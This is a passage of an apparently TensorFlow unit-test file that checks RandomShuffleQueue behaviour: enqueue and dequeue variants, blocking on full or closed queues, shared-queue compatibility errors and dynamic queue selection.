enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testEmptyDequeueUpToWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = sess.run(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
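  # dequeue_up_to(n) behaves like dequeue_many(n) while the queue is open; the
  # difference only appears once the queue is closed, when it returns the
  # remaining elements (possibly fewer than n) instead of raising, as the
  # closed-queue tests below exercise.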
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.test_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(sess.run(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
def blocking_dequeue():
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, sess.run(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
        self.assertEqual(3, len(results))
results.extend(sess.run(dequeued_t))
        self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
        self.assertEqual(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(sess.run(dequeued_t))
        self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
        # While the last dequeue failed, we want to ensure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
sess.run(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
      # elements, and is blocked waiting for one more element to be dequeued.
for i in range(50):
queue_size = size_t.eval()
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
      # If neither the graph seed nor the op seed is provided, the default
      # value must be used, and if a shared queue has already been created,
      # the second queue op must accept whatever seed value was already set.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
